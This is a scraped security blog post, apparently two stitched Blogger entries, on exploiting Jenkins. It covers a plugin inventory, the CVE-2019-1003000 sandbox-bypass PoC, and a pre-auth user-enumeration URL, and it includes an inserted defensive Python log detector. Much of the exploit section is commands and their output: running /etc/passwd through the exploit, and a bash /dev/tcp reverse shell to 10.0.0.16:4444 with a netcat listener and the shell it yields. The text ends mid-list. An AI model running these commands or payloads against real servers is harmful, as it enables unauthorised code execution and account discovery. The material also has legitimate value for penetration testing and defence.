<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">handlebars JavaScript GUI Lib: Handlebars bundle plugin 1.1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">momentjs JavaScript GUI Lib: Moment.js bundle plugin 1.1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">plain-credentials Plain Credentials Plugin 1.5</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">docker-commons Docker Commons Plugin 1.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">git-client Git client plugin 2.7.6</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-rest-api Pipeline: REST API Plugin 2.10</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-basic-steps Pipeline: Basic Steps 2.14</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">credentials-binding Credentials Binding Plugin 1.17 (1.18)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-view Pipeline: Stage View Plugin 2.10</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-multibranch Pipeline: Multibranch 2.20</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">script-security Script Security Plugin 1.49 (1.53)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">git-server GIT server Plugin 1.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-step-api Pipeline: Step API 2.19</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-graph-analysis Pipeline Graph Analysis Plugin 1.9</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-model-api Pipeline: Model API 1.3.4.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-cps Pipeline: Groovy 2.61 (2.63)</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">branch-api Branch API Plugin 2.1.2</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jdk-tool JDK Tool Plugin 1.2</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">cloudbees-folder Folders Plugin 6.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">durable-task Durable Task Plugin 1.29</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">junit JUnit Plugin 1.27</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">scm-api SCM API Plugin 2.3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">ace-editor JavaScript GUI Lib: ACE Editor bundle plugin 1.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">display-url-api Display URL API 2.3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-support Pipeline: Supporting APIs 3.2</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span></div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">AFAIK you can't enumerate installed plugins and their versions without (elevated) authentication, the way you can with things like WordPress. If you know how, please let me know. For the time being I guess it's just throwing things to see what sticks.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1003000" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2019-1003000</a>) we can see that it affects the Script Security Plugin (the nist.gov entry says 2.49, but that's a typo and it should be 1.49), as seen on the Jenkins advisory <a href="https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266" target="_blank">https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">An exploit for the issue exists and is available here: <a href="https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc" target="_blank">https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc</a> it even comes with a docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">I'm seeing more and more servers/admins (rightfully) block access to the <span style="font-family: "courier new" , "courier" , monospace;">script</span> & <span style="font-family: "courier new" , "courier" , monospace;">scriptText </span>console because it's well documented that it's an immediate RCE.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIseUS_WxSJrn-6WQxlRQ0Pg84V7J0UG2xonbXs7t8O874FmNnGlVkWOjO-tSUkHUK8F06_S-t-PFq_-SMc43KDGmo0ncjJnbsUs26R6UVWqmqBElkhA0k8aeN8bnnscxpEmcGk6NPXGQ/s1600/Screen+Shot+2019-02-27+at+2.57.11+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444;"><img border="0" data-original-height="548" data-original-width="1572" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIseUS_WxSJrn-6WQxlRQ0Pg84V7J0UG2xonbXs7t8O874FmNnGlVkWOjO-tSUkHUK8F06_S-t-PFq_-SMc43KDGmo0ncjJnbsUs26R6UVWqmqBElkhA0k8aeN8bnnscxpEmcGk6NPXGQ/s400/Screen+Shot+2019-02-27+at+2.57.11+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">no script permission</span></td></tr>
</tbody></table>
<span style="color: #444444;">I encourage you to read the whole readme file in the repo but the most important part is here:</span><br />
<span style="color: #444444;"><br /></span>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50</span></blockquote>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).</span></blockquote>
<blockquote class="tr_bq" style="background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="color: #444444;">As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in <em style="box-sizing: border-box;">sandbox mode</em>. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.</span></blockquote>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Running the exploit:</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] connecting to jenkins...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] crafting payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] modifying job with payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] putting job build to queue...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] waiting for job to build...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] restoring job...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] fetching output...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] OUTPUT:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Started by user User 1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Running in Durability level: MAX_SURVIVABILITY</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[Pipeline] echo</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">root:x:0:0:root:/root:/bin/ash</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bin:x:1:1:bin:/bin:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">daemon:x:2:2:daemon:/sbin:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">adm:x:3:4:adm:/var/adm:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sync:x:5:0:sync:/sbin:/bin/sync</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">halt:x:7:0:halt:/sbin:/sbin/halt</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mail:x:8:12:mail:/var/spool/mail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">news:x:9:13:news:/usr/lib/news:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">operator:x:11:0:operator:/root:/bin/sh</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">man:x:13:15:man:/usr/man:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">cron:x:16:16:cron:/var/spool/cron:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">ftp:x:21:21::/var/lib/ftp:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sshd:x:22:22:sshd:/dev/null:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">games:x:35:35:games:/usr/games:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">postgres:x:70:70::/var/lib/postgresql:/bin/sh</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">cyrus:x:85:12::/usr/cyrus:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">vpopmail:x:89:89::/var/vpopmail:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">ntp:x:123:123:NTP:/var/empty:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">guest:x:405:100:guest:/dev/null:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">nobody:x:65534:65534:nobody:/:/sbin/nologin</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[Pipeline] End of Pipeline</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Finished: SUCCESS</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">You can certainly pull a reverse shell from it as well.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/10.0.0.16/4444 0>&1"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] connecting to jenkins...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] crafting payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] modifying job with payload...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] putting job build to queue...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] waiting for job to build...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] restoring job...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] fetching output...</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[+] OUTPUT:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Started by user User 1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Running in Durability level: MAX_SURVIVABILITY</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: inherit;">and you get:</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">nc -l 4444 -vv</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash: cannot set terminal process group (7): Not a tty</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash: no job control in this shell</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$ whoami</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">whoami</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">jenkins</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.4$</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
</span><br />
<span style="color: #444444;"><span style="font-family: inherit;">The TLDR: you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and you have Overall/Read and Job/Configure permissions, which a regular Jenkins user is more likely to have, and it doesn't require the script console.</span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-39139468414223673562019-02-26T13:46:00.001-05:002019-02-28T10:43:04.167-05:00Jenkins - messing with new exploits pt1<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins notes for:</span><br />
<a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</span></a><br />
<a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</span></a><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">To download old Jenkins WAR files:</span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
<a href="http://updates.jenkins-ci.org/download/war/" target="_blank">http://updates.jenkins-ci.org/download/war/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">The first bug in the blog is a username enumeration bug affecting:</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: inherit;"><br /></span>
</span><br />
<ul style="background-color: white; box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;">
<li style="box-sizing: border-box;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins weekly up to and including 2.145</span></li>
<li style="box-sizing: border-box;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins LTS up to and including 2.138.1</span></li>
</ul>
<div>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<span style="color: #212529; font-family: "lato" , "roboto" , "open sans" , sans-serif;"><span style="color: #444444; font-family: "times" , "times new roman" , serif; font-size: 14px;">From the blog:</span></span></div>
<div>
<div style="background-color: white; box-sizing: border-box; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<blockquote class="tr_bq">
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pre-auth User Information Leakage</span><br />
<span style="background-color: white; color: #444444; font-family: "times" , "times new roman" , serif;">While testing Jenkins, it’s a common scenario that you want to perform a brute-force attack but you don’t know which account you can try (a valid credential can read the source at least so it’s worth to be the first attempt).</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="background-color: white;">In this situation, this vulnerability is useful! </span><span style="background-color: white;">Due to the lack of permission check on search functionality. By modifying the </span><code style="background-color: rgba(0, 0, 0, 0.04); border-radius: 4px; box-sizing: border-box; padding: 2px 4px;">keyword</code><span style="background-color: white;"> from a to z, an attacker can list all users on Jenkins! </span></span></blockquote>
</div>
<div style="background-color: white; box-sizing: border-box; font-size: 1.25em; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">PoC:</span></div>
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]</span></code></pre>
</div>
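Because this endpoint answers without authentication, the only place a defender will see the a-to-z sweep is the web server or reverse-proxy access log. The following is an added example, not code from the original post or from Orange Tsai's write-up: it scans combined-format access log lines for hits on <code>/securityRealm/user/&lt;name&gt;/search/index</code> and flags any client that cycles through many distinct <code>q=</code> keywords inside a short window, which is exactly what the enumeration looks like on the wire. The log lines, client IPs, window and threshold are constructed for the example.

```python
"""Detect the pre-auth user-enumeration sweep against /securityRealm/.../search/index.

Added example, not from the original post or the Orange Tsai write-up. Reads
combined-format (nginx/Apache) access log lines; all sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

WINDOW_SECONDS = 60  # sliding window length (chosen for the example)
THRESHOLD = 6        # distinct ?q= values per client inside one window

# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# The search endpoint from the PoC URL; the user segment varies, so match any.
SEARCH_PATH_RE = re.compile(r"^/securityRealm/user/[^/]+/search/index$")
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed log: one client walking q=a..h in eight seconds, one client
# doing a single real search, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Feb/2019:14:55:42 -0500] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 200 5120
203.0.113.7 - - [25/Feb/2019:14:55:43 -0500] "GET /securityRealm/user/admin/search/index?q=b HTTP/1.1" 200 5020
203.0.113.7 - - [25/Feb/2019:14:55:44 -0500] "GET /securityRealm/user/admin/search/index?q=c HTTP/1.1" 200 5088
203.0.113.7 - - [25/Feb/2019:14:55:45 -0500] "GET /securityRealm/user/admin/search/index?q=d HTTP/1.1" 200 4990
203.0.113.7 - - [25/Feb/2019:14:55:46 -0500] "GET /securityRealm/user/admin/search/index?q=e HTTP/1.1" 200 5041
203.0.113.7 - - [25/Feb/2019:14:55:47 -0500] "GET /securityRealm/user/admin/search/index?q=f HTTP/1.1" 200 4975
203.0.113.7 - - [25/Feb/2019:14:55:48 -0500] "GET /securityRealm/user/admin/search/index?q=g HTTP/1.1" 200 5003
203.0.113.7 - - [25/Feb/2019:14:55:49 -0500] "GET /securityRealm/user/admin/search/index?q=h HTTP/1.1" 200 5110
198.51.100.4 - - [25/Feb/2019:14:56:01 -0500] "GET /securityRealm/user/admin/search/index?q=deploy HTTP/1.1" 200 4800
198.51.100.4 - - [25/Feb/2019:14:57:10 -0500] "GET /job/my-pipeline/ HTTP/1.1" 200 9104
"""


def parse_search_events(log_text: str) -> List[Tuple[str, datetime, str]]:
    """Return (client_ip, timestamp, keyword) for every hit on the search endpoint."""
    events: List[Tuple[str, datetime, str]] = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line
        target = urlsplit(match.group("target"))
        if not SEARCH_PATH_RE.match(target.path):
            continue  # some other Jenkins URL
        keyword = parse_qs(target.query).get("q", [""])[0]
        stamp = datetime.strptime(match.group("ts"), TS_FORMAT)
        events.append((match.group("ip"), stamp, keyword))
    return events


def find_enumeration_sweeps(log_text: str) -> Dict[str, int]:
    """Map client IP -> most distinct keywords it sent inside any WINDOW_SECONDS
    span, for clients at or above THRESHOLD. A single genuine search never trips it."""
    by_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ip, stamp, keyword in parse_search_events(log_text):
        by_ip[ip].append((stamp, keyword))
    flagged: Dict[str, int] = {}
    for ip, hits in by_ip.items():
        hits.sort()
        best = 0
        for i, (start, _) in enumerate(hits):  # window anchored at each hit
            keywords = {kw for stamp, kw in hits[i:]
                        if (stamp - start).total_seconds() <= WINDOW_SECONDS}
            best = max(best, len(keywords))
        if best >= THRESHOLD:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, count in find_enumeration_sweeps(SAMPLE_LOG).items():
        print(f"{ip}: {count} distinct search keywords within {WINDOW_SECONDS}s")
```

The check keys on distinct keywords rather than raw request count so that a user hammering refresh on one search is not flagged. A hit on this endpoint from a client that never authenticated is itself worth alerting on once the Jenkins version is one the advisory lists; the log alone cannot tell you whether a session cookie was present, so pair this with the proxy's auth fields if it records them.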
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHkkv11zMFibrJLfPwpbEvTpvRdvY9MGF_wH_ivvjOuf0BKEA6ZX1t-LWtfdVoUwtOOxOqgzT0VC90WRYGNWyw7UiucLMOmIQ-WfRrOBSX3kEro8v02mINz_gGpr2Ttc04-7LgzEFGwg/s1600/Screen+Shot+2019-02-25+at+2.55.42+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="798" data-original-width="1600" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHkkv11zMFibrJLfPwpbEvTpvRdvY9MGF_wH_ivvjOuf0BKEA6ZX1t-LWtfdVoUwtOOxOqgzT0VC90WRYGNWyw7UiucLMOmIQ-WfRrOBSX3kEro8v02mINz_gGpr2Ttc04-7LgzEFGwg/s640/Screen+Shot+2019-02-25+at+2.55.42+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/admin/search/index?q=a</span></td></tr>
</tbody></table>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEEvfIKjuuAJbX8OgtE8zaVdoqxMYNwqkOPkffDUN38TLIGyi6zrhAGAGS9Iyht43tloVvbGCpK1oS1wlifiOjkdNeBpbRQppFJmbGUj6CFMLEUTHU08EkJmDaxjUeS6_z4QNvxOIfenE/s1600/Screen+Shot+2019-02-25+at+2.57.06+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="496" data-original-width="1292" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEEvfIKjuuAJbX8OgtE8zaVdoqxMYNwqkOPkffDUN38TLIGyi6zrhAGAGS9Iyht43tloVvbGCpK1oS1wlifiOjkdNeBpbRQppFJmbGUj6CFMLEUTHU08EkJmDaxjUeS6_z4QNvxOIfenE/s640/Screen+Shot+2019-02-25+at+2.57.06+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/admin/search/index?q=c</span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
</span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: "times" , "times new roman" , serif; "><b>ALERT</b></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; ">Even though the advisory says 2.138_1, I tested against 2.138 and the exploit doesn't work.</span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;"></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">SOOOOO you are looking for Jenkins &lt;= 2.137</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><span style="font-family: "times" , "times new roman" , serif;">If Jenkins is really old, the above should work and so should</span> <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-1000395" style="font-family: times, "times new roman", serif;" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2017-1000395</a><span style="font-family: "times" , "times new roman" , serif;">, where you can get the email address via a similar query.</span></span></div>
</td></tr>
</tbody></table>
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">versions up to (including) 2.73.1</span></li>
